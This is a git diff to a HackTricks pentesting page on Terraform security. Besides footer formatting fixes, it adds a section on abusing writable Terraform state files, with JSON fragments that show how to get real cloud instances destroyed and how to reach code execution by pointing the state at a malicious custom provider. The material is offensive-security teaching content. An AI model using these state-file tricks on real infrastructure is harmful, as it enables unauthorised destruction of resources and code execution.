diff --git a/pentesting-ci-cd/terraform-security.md b/pentesting-ci-cd/terraform-security.md
index ab0ba11121..b599284cbc 100644
--- a/pentesting-ci-cd/terraform-security.md
+++ b/pentesting-ci-cd/terraform-security.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## Basic Information
-[From the docs: ](https://developer.hashicorp.com/terraform/intro)
+[From the docs:](https://developer.hashicorp.com/terraform/intro)
HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
@@ -144,6 +144,55 @@ output "dotoken" {
}
```
+## Abusing Terraform State Files
+
+In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+
+### Deleting resources
+
+There are 2 ways to destroy resources:
+
+1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
+
+Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+
+```json
+{
+ "mode": "managed",
+ "type": "aws_instance",
+ "name": "example",
+ "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+ "instances": [
+ {
+ "attributes": {
+ "id": "i-1234567890abcdefg"
+ }
+ }
+ ]
+},
+```
+
+2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
+
+For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+
+### RCE
+
+It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
+
+```json
+"resources": [
+{
+ "mode": "managed",
+ "type": "scaffolding_example",
+ "name": "example",
+ "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+ "instances": [
+
+ ]
+},
+```
+
## Audit Tools
* [**tfsec**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
@@ -154,7 +203,7 @@ output "dotoken" {
* [Atlantis Security](atlantis-security.md)
* [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro)
-
+* [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
@@ -165,7 +214,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.